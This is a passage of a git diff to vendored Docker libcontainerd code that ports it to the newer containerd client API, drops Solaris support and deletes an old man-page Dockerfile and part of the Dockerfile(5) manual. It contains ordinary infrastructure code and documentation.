+	"time"
 
-	containerd "github.com/docker/containerd/api/grpc/types"
+	"github.com/containerd/containerd"
+	"github.com/containerd/containerd/cio"
 	"github.com/opencontainers/runtime-spec/specs-go"
-	"golang.org/x/net/context"
 )
 
-// State constants used in state change reporting.
+// EventType represents a possible event from libcontainerd
+type EventType string
+
+// Event constants used when reporting events
 const (
-	StateStart       = "start-container"
-	StatePause       = "pause"
-	StateResume      = "resume"
-	StateExit        = "exit"
-	StateRestore     = "restore"
-	StateExitProcess = "exit-process"
-	StateOOM         = "oom" // fake state
+	EventUnknown     EventType = "unknown"
+	EventExit        EventType = "exit"
+	EventOOM         EventType = "oom"
+	EventCreate      EventType = "create"
+	EventStart       EventType = "start"
+	EventExecAdded   EventType = "exec-added"
+	EventExecStarted EventType = "exec-started"
+	EventPaused      EventType = "paused"
+	EventResumed     EventType = "resumed"
 )
 
-// CommonStateInfo contains the state info common to all platforms.
-type CommonStateInfo struct { // FIXME: event?
-	State     string
-	Pid       uint32
-	ExitCode  uint32
-	ProcessID string
+// Status represents the current status of a container
+type Status string
+
+// Possible container statuses
+const (
+	// Running indicates the process is currently executing
+	StatusRunning Status = "running"
+	// Created indicates the process has been created within containerd but the
+	// user's defined process has not started
+	StatusCreated Status = "created"
+	// Stopped indicates that the process has ran and exited
+	StatusStopped Status = "stopped"
+	// Paused indicates that the process is currently paused
+	StatusPaused Status = "paused"
+	// Pausing indicates that the process is currently switching from a
+	// running state into a paused state
+	StatusPausing Status = "pausing"
+	// Unknown indicates that we could not determine the status from the runtime
+	StatusUnknown Status = "unknown"
+)
+
+// Remote on Linux defines the accesspoint to the containerd grpc API.
+// Remote on Windows is largely an unimplemented interface as there is
+// no remote containerd.
+type Remote interface {
+	// Client returns a new Client instance connected with given Backend.
+	NewClient(namespace string, backend Backend) (Client, error)
+	// Cleanup stops containerd if it was started by libcontainerd.
+	// Note this is not used on Windows as there is no remote containerd.
+	Cleanup()
+}
+
+// RemoteOption allows to configure parameters of remotes.
+// This is unused on Windows.
+type RemoteOption interface {
+	Apply(Remote) error
+}
+
+// EventInfo contains the event info
+type EventInfo struct {
+	ContainerID string
+	ProcessID   string
+	Pid         uint32
+	ExitCode    uint32
+	ExitedAt    time.Time
+	OOMKilled   bool
+	Error       error
 }
 
 // Backend defines callbacks that the client of the library needs to implement.
 type Backend interface {
-	StateChanged(containerID string, state StateInfo) error
+	ProcessEvent(containerID string, event EventType, ei EventInfo) error
 }
 
 // Client provides access to containerd features.
 type Client interface {
-	GetServerVersion(ctx context.Context) (*ServerVersion, error)
-	Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) error
-	Signal(containerID string, sig int) error
-	SignalProcess(containerID string, processFriendlyName string, sig int) error
-	AddProcess(ctx context.Context, containerID, processFriendlyName string, process Process, attachStdio StdioCallback) (int, error)
-	Resize(containerID, processFriendlyName string, width, height int) error
-	Pause(containerID string) error
-	Resume(containerID string) error
-	Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error
-	Stats(containerID string) (*Stats, error)
-	GetPidsForContainer(containerID string) ([]int, error)
-	Summary(containerID string) ([]Summary, error)
-	UpdateResources(containerID string, resources Resources) error
-	CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error
-	DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error
-	ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error)
-}
+	Version(ctx context.Context) (containerd.Version, error)
 
-// CreateOption allows to configure parameters of container creation.
-type CreateOption interface {
-	Apply(interface{}) error
-}
+	Restore(ctx context.Context, containerID string, attachStdio StdioCallback) (alive bool, pid int, err error)
 
-// StdioCallback is called to connect a container or process stdio.
-type StdioCallback func(IOPipe) error
+	Create(ctx context.Context, containerID string, spec *specs.Spec, runtimeOptions interface{}) error
+	Start(ctx context.Context, containerID, checkpointDir string, withStdin bool, attachStdio StdioCallback) (pid int, err error)
+	SignalProcess(ctx context.Context, containerID, processID string, signal int) error
+	Exec(ctx context.Context, containerID, processID string, spec *specs.Process, withStdin bool, attachStdio StdioCallback) (int, error)
+	ResizeTerminal(ctx context.Context, containerID, processID string, width, height int) error
+	CloseStdin(ctx context.Context, containerID, processID string) error
+	Pause(ctx context.Context, containerID string) error
+	Resume(ctx context.Context, containerID string) error
+	Stats(ctx context.Context, containerID string) (*Stats, error)
+	ListPids(ctx context.Context, containerID string) ([]uint32, error)
+	Summary(ctx context.Context, containerID string) ([]Summary, error)
+	DeleteTask(ctx context.Context, containerID string) (uint32, time.Time, error)
+	Delete(ctx context.Context, containerID string) error
+	Status(ctx context.Context, containerID string) (Status, error)
 
-// IOPipe contains the stdio streams.
-type IOPipe struct {
-	Stdin    io.WriteCloser
-	Stdout   io.ReadCloser
-	Stderr   io.ReadCloser
-	Terminal bool // Whether stderr is connected on Windows
+	UpdateResources(ctx context.Context, containerID string, resources *Resources) error
+	CreateCheckpoint(ctx context.Context, containerID, checkpointDir string, exit bool) error
 }
 
-// ServerVersion contains version information as retrieved from the
-// server
-type ServerVersion struct {
-	containerd.GetServerVersionResponse
-}
+// StdioCallback is called to connect a container or process stdio.
+type StdioCallback func(io *cio.DirectIO) (cio.IO, error)
diff --git a/vendor/github.com/docker/docker/libcontainerd/types_linux.go b/vendor/github.com/docker/docker/libcontainerd/types_linux.go
index cc2a17aec6..943382b9b0 100644
--- a/vendor/github.com/docker/docker/libcontainerd/types_linux.go
+++ b/vendor/github.com/docker/docker/libcontainerd/types_linux.go
@@ -1,49 +1,30 @@
-package libcontainerd
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
 
 import (
-	containerd "github.com/docker/containerd/api/grpc/types"
+	"time"
+
+	"github.com/containerd/cgroups"
 	"github.com/opencontainers/runtime-spec/specs-go"
 )
 
-// Process contains information to start a specific application inside the container.
-type Process struct {
-	// Terminal creates an interactive terminal for the container.
-	Terminal bool `json:"terminal"`
-	// User specifies user information for the process.
-	User *specs.User `json:"user"`
-	// Args specifies the binary and arguments for the application to execute.
-	Args []string `json:"args"`
-	// Env populates the process environment for the process.
-	Env []string `json:"env,omitempty"`
-	// Cwd is the current working directory for the process and must be
-	// relative to the container's root.
-	Cwd *string `json:"cwd"`
-	// Capabilities are linux capabilities that are kept for the container.
-	Capabilities []string `json:"capabilities,omitempty"`
-	// Rlimits specifies rlimit options to apply to the process.
-	Rlimits []specs.Rlimit `json:"rlimits,omitempty"`
-	// ApparmorProfile specifies the apparmor profile for the container.
-	ApparmorProfile *string `json:"apparmorProfile,omitempty"`
-	// SelinuxLabel specifies the selinux context that the container process is run as.
-	SelinuxLabel *string `json:"selinuxLabel,omitempty"`
-}
-
-// StateInfo contains description about the new state container has entered.
-type StateInfo struct {
-	CommonStateInfo
+// Summary is not used on linux
+type Summary struct{}
 
-	// Platform specific StateInfo
-	OOMKilled bool
+// Stats holds metrics properties as returned by containerd
+type Stats struct {
+	Read    time.Time
+	Metrics *cgroups.Metrics
 }
 
-// Stats contains a stats properties from containerd.
-type Stats containerd.StatsResponse
-
-// Summary contains a container summary from containerd
-type Summary struct{}
+func interfaceToStats(read time.Time, v interface{}) *Stats {
+	return &Stats{
+		Metrics: v.(*cgroups.Metrics),
+		Read:    read,
+	}
+}
 
-// Resources defines updatable container resource values.
-type Resources containerd.UpdateResource
+// Resources defines updatable container resource values. TODO: it must match containerd upcoming API
+type Resources specs.LinuxResources
 
 // Checkpoints contains the details of a checkpoint
-type Checkpoints containerd.ListCheckpointResponse
+type Checkpoints struct{}
diff --git a/vendor/github.com/docker/docker/libcontainerd/types_solaris.go b/vendor/github.com/docker/docker/libcontainerd/types_solaris.go
deleted file mode 100644
index dbafef669f..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/types_solaris.go
+++ /dev/null
@@ -1,43 +0,0 @@
-package libcontainerd
-
-import (
-	containerd "github.com/docker/containerd/api/grpc/types"
-	"github.com/opencontainers/runtime-spec/specs-go"
-)
-
-// Process contains information to start a specific application inside the container.
-type Process struct {
-	// Terminal creates an interactive terminal for the container.
-	Terminal bool `json:"terminal"`
-	// User specifies user information for the process.
-	User *specs.User `json:"user"`
-	// Args specifies the binary and arguments for the application to execute.
-	Args []string `json:"args"`
-	// Env populates the process environment for the process.
-	Env []string `json:"env,omitempty"`
-	// Cwd is the current working directory for the process and must be
-	// relative to the container's root.
-	Cwd *string `json:"cwd"`
-	// Capabilities are linux capabilities that are kept for the container.
-	Capabilities []string `json:"capabilities,omitempty"`
-}
-
-// Stats contains a stats properties from containerd.
-type Stats struct{}
-
-// Summary contains a container summary from containerd
-type Summary struct{}
-
-// StateInfo contains description about the new state container has entered.
-type StateInfo struct {
-	CommonStateInfo
-
-	// Platform specific StateInfo
-	OOMKilled bool
-}
-
-// Resources defines updatable container resource values.
-type Resources struct{}
-
-// Checkpoints contains the details of a checkpoint
-type Checkpoints containerd.ListCheckpointResponse
diff --git a/vendor/github.com/docker/docker/libcontainerd/types_windows.go b/vendor/github.com/docker/docker/libcontainerd/types_windows.go
index 24a9a96440..9041a2e8d5 100644
--- a/vendor/github.com/docker/docker/libcontainerd/types_windows.go
+++ b/vendor/github.com/docker/docker/libcontainerd/types_windows.go
@@ -1,71 +1,34 @@
-package libcontainerd
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
 
 import (
+	"time"
+
 	"github.com/Microsoft/hcsshim"
-	"github.com/opencontainers/runtime-spec/specs-go"
+	opengcs "github.com/Microsoft/opengcs/client"
 )
 
-// Process contains information to start a specific application inside the container.
-type Process specs.Process
-
 // Summary contains a ProcessList item from HCS to support `top`
 type Summary hcsshim.ProcessListItem
 
-// StateInfo contains description about the new state container has entered.
-type StateInfo struct {
-	CommonStateInfo
-
-	// Platform specific StateInfo
-
-	UpdatePending bool // Indicates that there are some update operations pending that should be completed by a servicing container.
+// Stats contains statistics from HCS
+type Stats struct {
+	Read     time.Time
+	HCSStats *hcsshim.Statistics
 }
 
-// Stats contains statics from HCS
-type Stats hcsshim.Statistics
+func interfaceToStats(read time.Time, v interface{}) *Stats {
+	return &Stats{
+		HCSStats: v.(*hcsshim.Statistics),
+		Read:     read,
+	}
+}
 
 // Resources defines updatable container resource values.
 type Resources struct{}
 
-// ServicingOption is a CreateOption with a no-op application that signifies
-// the container needs to be used for a Windows servicing operation.
-type ServicingOption struct {
-	IsServicing bool
-}
-
-// FlushOption is a CreateOption that signifies if the container should be
-// started with flushes ignored until boot has completed. This is an optimisation
-// for first boot of a container.
-type FlushOption struct {
-	IgnoreFlushesDuringBoot bool
-}
-
-// HyperVIsolationOption is a CreateOption that indicates whether the runtime
-// should start the container as a Hyper-V container, and if so, the sandbox path.
-type HyperVIsolationOption struct {
-	IsHyperV    bool
-	SandboxPath string `json:",omitempty"`
-}
-
-// LayerOption is a CreateOption that indicates to the runtime the layer folder
-// and layer paths for a container.
-type LayerOption struct {
-	// LayerFolder is the path to the current layer folder. Empty for Hyper-V containers.
-	LayerFolderPath string `json:",omitempty"`
-	// Layer paths of the parent layers
-	LayerPaths []string
-}
-
-// NetworkEndpointsOption is a CreateOption that provides the runtime list
-// of network endpoints to which a container should be attached during its creation.
-type NetworkEndpointsOption struct {
-	Endpoints                []string
-	AllowUnqualifiedDNSQuery bool
-}
-
-// CredentialsOption is a CreateOption that indicates the credentials from
-// a credential spec to be used to the runtime
-type CredentialsOption struct {
-	Credentials string
+// LCOWOption is a CreateOption required for LCOW configuration
+type LCOWOption struct {
+	Config *opengcs.Config
 }
 
 // Checkpoint holds the details of a checkpoint (not supported in windows)
diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_linux.go b/vendor/github.com/docker/docker/libcontainerd/utils_linux.go
index 78828bcdad..ce17d1963d 100644
--- a/vendor/github.com/docker/docker/libcontainerd/utils_linux.go
+++ b/vendor/github.com/docker/docker/libcontainerd/utils_linux.go
@@ -1,62 +1,12 @@
-package libcontainerd
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
 
-import (
-	"syscall"
+import "syscall"
 
-	containerd "github.com/docker/containerd/api/grpc/types"
-	"github.com/opencontainers/runtime-spec/specs-go"
-)
-
-func getRootIDs(s specs.Spec) (int, int, error) {
-	var hasUserns bool
-	for _, ns := range s.Linux.Namespaces {
-		if ns.Type == specs.UserNamespace {
-			hasUserns = true
-			break
-		}
-	}
-	if !hasUserns {
-		return 0, 0, nil
-	}
-	uid := hostIDFromMap(0, s.Linux.UIDMappings)
-	gid := hostIDFromMap(0, s.Linux.GIDMappings)
-	return uid, gid, nil
-}
-
-func hostIDFromMap(id uint32, mp []specs.IDMapping) int {
-	for _, m := range mp {
-		if id >= m.ContainerID && id <= m.ContainerID+m.Size-1 {
-			return int(m.HostID + id - m.ContainerID)
-		}
-	}
-	return 0
-}
-
-func systemPid(ctr *containerd.Container) uint32 {
-	var pid uint32
-	for _, p := range ctr.Processes {
-		if p.Pid == InitFriendlyName {
-			pid = p.SystemPid
-		}
-	}
-	return pid
-}
-
-func convertRlimits(sr []specs.Rlimit) (cr []*containerd.Rlimit) {
-	for _, r := range sr {
-		cr = append(cr, &containerd.Rlimit{
-			Type: r.Type,
-			Hard: r.Hard,
-			Soft: r.Soft,
-		})
-	}
-	return
-}
-
-// setPDeathSig sets the parent death signal to SIGKILL
-func setSysProcAttr(sid bool) *syscall.SysProcAttr {
+// containerdSysProcAttr returns the SysProcAttr to use when exec'ing
+// containerd
+func containerdSysProcAttr() *syscall.SysProcAttr {
 	return &syscall.SysProcAttr{
-		Setsid:    sid,
+		Setsid:    true,
 		Pdeathsig: syscall.SIGKILL,
 	}
 }
diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go b/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go
deleted file mode 100644
index 49632b45e5..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go
+++ /dev/null
@@ -1,27 +0,0 @@
-package libcontainerd
-
-import (
-	"syscall"
-
-	containerd "github.com/docker/containerd/api/grpc/types"
-	"github.com/opencontainers/runtime-spec/specs-go"
-)
-
-func getRootIDs(s specs.Spec) (int, int, error) {
-	return 0, 0, nil
-}
-
-func systemPid(ctr *containerd.Container) uint32 {
-	var pid uint32
-	for _, p := range ctr.Processes {
-		if p.Pid == InitFriendlyName {
-			pid = p.SystemPid
-		}
-	}
-	return pid
-}
-
-// setPDeathSig sets the parent death signal to SIGKILL
-func setSysProcAttr(sid bool) *syscall.SysProcAttr {
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_windows.go b/vendor/github.com/docker/docker/libcontainerd/utils_windows.go
index 41ac40d2c2..fbf243d4f9 100644
--- a/vendor/github.com/docker/docker/libcontainerd/utils_windows.go
+++ b/vendor/github.com/docker/docker/libcontainerd/utils_windows.go
@@ -1,6 +1,12 @@
-package libcontainerd
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
 
-import "strings"
+import (
+	"strings"
+
+	"syscall"
+
+	opengcs "github.com/Microsoft/opengcs/client"
+)
 
 // setupEnvironmentVariables converts a string array of environment variables
 // into a map as required by the HCS. Source array is in format [v1=k1] [v2=k2] etc.
@@ -15,32 +21,26 @@ func setupEnvironmentVariables(a []string) map[string]string {
 	return r
 }
 
-// Apply for a servicing option is a no-op.
-func (s *ServicingOption) Apply(interface{}) error {
-	return nil
-}
-
-// Apply for the flush option is a no-op.
-func (f *FlushOption) Apply(interface{}) error {
-	return nil
-}
-
-// Apply for the hypervisolation option is a no-op.
-func (h *HyperVIsolationOption) Apply(interface{}) error {
-	return nil
-}
-
-// Apply for the layer option is a no-op.
-func (h *LayerOption) Apply(interface{}) error {
+// Apply for the LCOW option is a no-op.
+func (s *LCOWOption) Apply(interface{}) error {
 	return nil
 }
 
-// Apply for the network endpoints option is a no-op.
-func (s *NetworkEndpointsOption) Apply(interface{}) error {
-	return nil
+// debugGCS is a dirty hack for debugging for Linux Utility VMs. It simply
+// runs a bunch of commands inside the UVM, but seriously aides in advanced debugging.
+func (c *container) debugGCS() {
+	if c == nil || c.isWindows || c.hcsContainer == nil {
+		return
+	}
+	cfg := opengcs.Config{
+		Uvm:               c.hcsContainer,
+		UvmTimeoutSeconds: 600,
+	}
+	cfg.DebugGCS()
 }
 
-// Apply for the credentials option is a no-op.
-func (s *CredentialsOption) Apply(interface{}) error {
+// containerdSysProcAttr returns the SysProcAttr to use when exec'ing
+// containerd
+func containerdSysProcAttr() *syscall.SysProcAttr {
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go b/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go
index f3679bfb71..2e0c260eca 100644
--- a/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go
+++ b/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go
@@ -1,4 +1,4 @@
-package libcontainerd
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
 
 import (
 	"testing"
diff --git a/vendor/github.com/docker/docker/man/Dockerfile b/vendor/github.com/docker/docker/man/Dockerfile
deleted file mode 100644
index 80e97ff01e..0000000000
--- a/vendor/github.com/docker/docker/man/Dockerfile
+++ /dev/null
@@ -1,24 +0,0 @@
-FROM    golang:1.7.5-alpine
-
-RUN     apk add -U git bash curl gcc musl-dev make
-
-RUN     mkdir -p /go/src /go/bin /go/pkg
-RUN     export GLIDE=v0.11.1; \
-        export TARGET=/go/src/github.com/Masterminds; \
-        mkdir -p ${TARGET} && \
-        git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \
-        cd ${TARGET}/glide && \
-        git checkout $GLIDE && \
-        make build && \
-        cp ./glide /usr/bin/glide && \
-        cd / && rm -rf /go/src/* /go/bin/* /go/pkg/*
-
-COPY    glide.yaml /manvendor/
-COPY    glide.lock /manvendor/
-WORKDIR /manvendor/
-RUN     glide install && mv vendor src
-ENV     GOPATH=$GOPATH:/manvendor
-RUN     go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man
-
-WORKDIR /go/src/github.com/docker/docker/
-ENTRYPOINT ["man/generate.sh"]
diff --git a/vendor/github.com/docker/docker/man/Dockerfile.5.md b/vendor/github.com/docker/docker/man/Dockerfile.5.md
deleted file mode 100644
index 5191b1930a..0000000000
--- a/vendor/github.com/docker/docker/man/Dockerfile.5.md
+++ /dev/null
@@ -1,474 +0,0 @@
-% DOCKERFILE(5) Docker User Manuals
-% Zac Dover
-% May 2014
-# NAME
-
-Dockerfile - automate the steps of creating a Docker image
-
-# INTRODUCTION
-
-The **Dockerfile** is a configuration file that automates the steps of creating
-a Docker image. It is similar to a Makefile. Docker reads instructions from the
-**Dockerfile** to automate the steps otherwise performed manually to create an
-image. To build an image, create a file called **Dockerfile**.
-
-The **Dockerfile** describes the steps taken to assemble the image. When the
-**Dockerfile** has been created, call the `docker build` command, using the
-path of directory that contains **Dockerfile** as the argument.
-
-# SYNOPSIS
-
-INSTRUCTION arguments
-
-For example:
-
-  FROM image
-
-# DESCRIPTION
-
-A Dockerfile is a file that automates the steps of creating a Docker image.
-A Dockerfile is similar to a Makefile.
-
-# USAGE
-
-  docker build .
-
-  -- Runs the steps and commits them, building a final image.
-  The path to the source repository defines where to find the context of the
-  build. The build is run by the Docker daemon, not the CLI. The whole
-  context must be transferred to the daemon. The Docker CLI reports
-  `"Sending build context to Docker daemon"` when the context is sent to the
-  daemon.
-
-  ```
-  docker build -t repository/tag .
-  ```
-
-  -- specifies a repository and tag at which to save the new image if the build
-  succeeds. The Docker daemon runs the steps one-by-one, committing the result
-  to a new image if necessary, before finally outputting the ID of the new
-  image. The Docker daemon automatically cleans up the context it is given.
-
-  Docker re-uses intermediate images whenever possible. This significantly
-  accelerates the *docker build* process.
-
-# FORMAT
-
-  `FROM image`
-
-  `FROM image:tag`
-
-  `FROM image@digest`
-
-  -- The **FROM** instruction sets the base image for subsequent instructions. A
-  valid Dockerfile must have **FROM** as its first instruction. The image can be any
-  valid image. It is easy to start by pulling an image from the public
-  repositories.
-
-  -- **FROM** must be the first non-comment instruction in Dockerfile.
-
-  -- **FROM** may appear multiple times within a single Dockerfile in order to create
-  multiple images. Make a note of the last image ID output by the commit before
-  each new **FROM** command.
-
-  -- If no tag is given to the **FROM** instruction, Docker applies the
-  `latest` tag. If the used tag does not exist, an error is returned.
-
-  -- If no digest is given to the **FROM** instruction, Docker applies the
-  `latest` tag. If the used tag does not exist, an error is returned.
-
-**MAINTAINER**
-  -- **MAINTAINER** sets the Author field for the generated images.
-  Useful for providing users with an email or url for support.
-
-**RUN**
-  -- **RUN** has two forms:
-
-  ```
-  # the command is run in a shell - /bin/sh -c
-  RUN <command>
-
-  # Executable form
-  RUN ["executable", "param1", "param2"]
-  ```
-
-
-  -- The **RUN** instruction executes any commands in a new layer on top of the current
-  image and commits the results. The committed image is used for the next step in
-  Dockerfile.
-
-  -- Layering **RUN** instructions and generating commits conforms to the core
-  concepts of Docker where commits are cheap and containers can be created from
-  any point in the history of an image. This is similar to source control.  The
-  exec form makes it possible to avoid shell string munging. The exec form makes
-  it possible to **RUN** commands using a base image that does not contain `/bin/sh`.
-
-  Note that the exec form is parsed as a JSON array, which means that you must
-  use double-quotes (") around words not single-quotes (').
-
-**CMD**
-  -- **CMD** has three forms:
-
-  ```
-  # Executable form
-  CMD ["executable", "param1", "param2"]`
-
-  # Provide default arguments to ENTRYPOINT
-  CMD ["param1", "param2"]`
-
-  # the command is run in a shell - /bin/sh -c
-  CMD command param1 param2
-  ```
-
-  -- There should be only one **CMD** in a Dockerfile. If more than one **CMD** is listed, only
-  the last **CMD** takes effect.
-  The main purpose of a **CMD** is to provide defaults for an executing container.
-  These defaults may include an executable, or they can omit the executable. If
-  they omit the executable, an **ENTRYPOINT** must be specified.
-  When used in the shell or exec formats, the **CMD** instruction sets the command to
-  be executed when running the image.
-  If you use the shell form of the **CMD**, the `<command>` executes in `/bin/sh -c`:
-
-  Note that the exec form is parsed as a JSON array, which means that you must
-  use double-quotes (") around words not single-quotes (').
-
-  ```
-  FROM ubuntu
-  CMD echo "This is a test." | wc -
-  ```
-
-  -- If you run **command** without a shell, then you must express the command as a
-  JSON array and give the full path to the executable. This array form is the
-  preferred form of **CMD**. All additional parameters must be individually expressed
-  as strings in the array:
-
-  ```
-  FROM ubuntu
-  CMD ["/usr/bin/wc","--help"]
-  ```
-
-  -- To make the container run the same executable every time, use **ENTRYPOINT** in
-  combination with **CMD**.
-  If the user specifies arguments to `docker run`, the specified commands
-  override the default in **CMD**.
-  Do not confuse **RUN** with **CMD**. **RUN** runs a command and commits the result.
-  **CMD** executes nothing at build time, but specifies the intended command for
-  the image.
-
-**LABEL**
-  -- `LABEL <key>=<value> [<key>=<value> ...]`or
-  ```
-  LABEL <key>[ <value>]
-  LABEL <key>[ <value>]
-  ...
-  ```
-  The **LABEL** instruction adds metadata to an image. A **LABEL** is a
-  key-value pair. To specify a **LABEL** without a value, simply use an empty
-  string. To include spaces within a **LABEL** value, use quotes and
-  backslashes as you would in command-line parsing.
-
-  ```
-  LABEL com.example.vendor="ACME Incorporated"
-  LABEL com.example.vendor "ACME Incorporated"
-  LABEL com.example.vendor.is-beta ""
-  LABEL com.example.vendor.is-beta=
-  LABEL com.example.vendor.is-beta=""
-  ```
-
-  An image can have more than one label. To specify multiple labels, separate
-  each key-value pair by a space.
-
-  Labels are additive including `LABEL`s in `FROM` images. As the system
-  encounters and then applies a new label, new `key`s override any previous
-  labels with identical keys.
-
-  To display an image's labels, use the `docker inspect` command.
-
-**EXPOSE**
-  -- `EXPOSE <port> [<port>...]`
-  The **EXPOSE** instruction informs Docker that the container listens on the
-  specified network ports at runtime. Docker uses this information to
-  interconnect containers using links and to set up port redirection on the host
-  system.
-
-**ENV**
-  -- `ENV <key> <value>`
-  The **ENV** instruction sets the environment variable <key> to
-  the value `<value>`. This value is passed to all future
-  **RUN**, **ENTRYPOINT**, and **CMD** instructions. This is
-  functionally equivalent to prefixing the command with `<key>=<value>`.  The
-  environment variables that are set with **ENV** persist when a container is run
-  from the resulting image. Use `docker inspect` to inspect these values, and
-  change them using `docker run --env <key>=<value>`.
-
-  Note that setting "`ENV DEBIAN_FRONTEND noninteractive`" may cause
-  unintended consequences, because it will persist when the container is run
-  interactively, as with the following command: `docker run -t -i image bash`
-
-**ADD**
-  -- **ADD** has two forms:
-
-  ```
-  ADD <src> <dest>
-
-  # Required for paths with whitespace
-  ADD ["<src>",... "<dest>"]
-  ```
-
-  The **ADD** instruction copies new files, directories
-  or remote file URLs to the filesystem of the container at path `<dest>`.
-  Multiple `<src>` resources may be specified but if they are files or directories
-  then they must be relative to the source directory that is being built
-  (the context of the build). The `<dest>` is the absolute path, or path relative
-  to **WORKDIR**, into which the source is copied inside the target container.
-  If the `<src>` argument is a local file in a recognized compression format
-  (tar, gzip, bzip2, etc) then it is unpacked at the specified `<dest>` in the
-  container's filesystem.  Note that only local compressed files will be unpacked,
-  i.e., the URL download and archive unpacking features cannot be used together.
-  All new directories are created with mode 0755 and with the uid and gid of **0**.
-
-**COPY**
-  -- **COPY** has two forms:
-
-  ```
-  COPY <src> <dest>
-
-  # Required for paths with whitespace
-  COPY ["<src>",... "<dest>"]
-  ```
-
-  The **COPY** instruction copies new files from `<src>` and
-  adds them to the filesystem of the container at path <dest>. The `<src>` must be
-  the path to a file or directory relative to the source directory that is
-  being built (the context of the build) or a remote file URL. The `<dest>` is an
-  absolute path, or a path relative to **WORKDIR**, into which the source will
-  be copied inside the target container. If you **COPY** an archive file it will
-  land in the container exactly as it appears in the build context without any
-  attempt to unpack it.  All new files and directories are created with mode **0755**
-  and with the uid and gid of **0**.
-
-**ENTRYPOINT**
-  -- **ENTRYPOINT** has two forms:
-
-  ```
-  # executable form
-  ENTRYPOINT ["executable", "param1", "param2"]`
-
-  # run command in a shell - /bin/sh -c
-  ENTRYPOINT command param1 param2
-  ```
-
-  -- An **ENTRYPOINT** helps you configure a
-  container that can be run as an executable. When you specify an **ENTRYPOINT**,
-  the whole container runs as if it was only that executable.  The **ENTRYPOINT**
-  instruction adds an entry command that is not overwritten when arguments are
-  passed to docker run. This is different from the behavior of **CMD**. This allows
-  arguments to be passed to the entrypoint, for instance `docker run <image> -d`
-  passes the -d argument to the **ENTRYPOINT**.  Specify parameters either in the
-  **ENTRYPOINT** JSON array (as in the preferred exec form above), or by using a **CMD**
-  statement.  Parameters in the **ENTRYPOINT** are not overwritten by the docker run
-  arguments.  Parameters specified via **CMD** are overwritten by docker run
-  arguments.  Specify a plain string for the **ENTRYPOINT**, and it will execute in
-  `/bin/sh -c`, like a **CMD** instruction:
-
-  ```
-  FROM ubuntu
-  ENTRYPOINT wc -l -
-  ```
-
-  This means that the Dockerfile's image always takes stdin as input (that's
-  what "-" means), and prints the number of lines (that's what "-l" means). To
-  make this optional but default, use a **CMD**:
-
-  ```
-  FROM ubuntu
-  CMD ["-l", "-"]
-  ENTRYPOINT ["/usr/bin/wc"]
-  ```
-
-**VOLUME**
-  -- `VOLUME ["/data"]`
-  The **VOLUME** instruction creates a mount point with the specified name and marks
-  it as holding externally-mounted volumes from the native host or from other
-  containers.
-
-**USER**
-  -- `USER daemon`
-  Sets the username or UID used for running subsequent commands.
-
-  The **USER** instruction can optionally be used to set the group or GID. The
-  followings examples are all valid:
-  USER [user | user:group | uid | uid:gid | user:gid | uid:group ]
-
-  Until the **USER** instruction is set, instructions will be run as root. The USER
-  instruction can be used any number of times in a Dockerfile, and will only affect
-  subsequent commands.
-
-**WORKDIR**
-  -- `WORKDIR /path/to/workdir`
-  The **WORKDIR** instruction sets the working directory for the **RUN**, **CMD**,
-  **ENTRYPOINT**, **COPY** and **ADD** Dockerfile commands that follow it. It can
-  be used multiple times in a single Dockerfile. Relative paths are defined
-  relative to the path of the previous **WORKDIR** instruction. For example:
-
-  ```
-  WORKDIR /a
-  WORKDIR b
-  WORKDIR c
-  RUN pwd
-  ```
-
-  In the above example, the output of the **pwd** command is **a/b/c**.
-
-**ARG**
-   -- ARG <name>[=<default value>]
-
-  The `ARG` instruction defines a variable that users can pass at build-time to
-  the builder with the `docker build` command using the `--build-arg
-  <varname>=<value>` flag. If a user specifies a build argument that was not
-  defined in the Dockerfile, the build outputs a warning.
-
-  ```
-  [Warning] One or more build-args [foo] were not consumed
-  ```
-
-  The Dockerfile author can define a single variable by specifying `ARG` once or many
-  variables by specifying `ARG` more than once. For example, a valid Dockerfile:
-
-  ```
-  FROM busybox
-  ARG user1
-  ARG buildno
-  ...
-  ```
-
-  A Dockerfile author may optionally specify a default value for an `ARG` instruction:
-
-  ```
-  FROM busybox
-  ARG user1=someuser
-  ARG buildno=1
-  ...
-  ```
-
-  If an `ARG` value has a default and if there is no value passed at build-time, the
-  builder uses the default.
-
-  An `ARG` variable definition comes into effect from the line on which it is
-  defined in the `Dockerfile` not from the argument's use on the command-line or
-  elsewhere.  For example, consider this Dockerfile:
-
-  ```
-  1 FROM busybox
-  2 USER ${user:-some_user}
-  3 ARG user
-  4 USER $user
-  ...
-  ```
-  A user builds this file by calling:
-
-  ```
-  $ docker build --build-arg user=what_user Dockerfile
-  ```
-
-  The `USER` at line 2 evaluates to `some_user` as the `user` variable is defined on the
-  subsequent line 3. The `USER` at line 4 evaluates to `what_user` as `user` is
-  defined and the `what_user` value was passed on the command line. Prior to its definition by an
-  `ARG` instruction, any use of a variable results in an empty string.
-
-  > **Warning:** It is not recommended to use build-time variables for
-  >  passing secrets like github keys, user credentials etc. Build-time variable
-  >  values are visible to any user of the image with the `docker history` command.
-
-  You can use an `ARG` or an `ENV` instruction to specify variables that are
-  available to the `RUN` instruction. Environment variables defined using the
-  `ENV` instruction always override an `ARG` instruction of the same name. Consider
-  this Dockerfile with an `ENV` and `ARG` instruction.
-
-  ```
-  1 FROM ubuntu
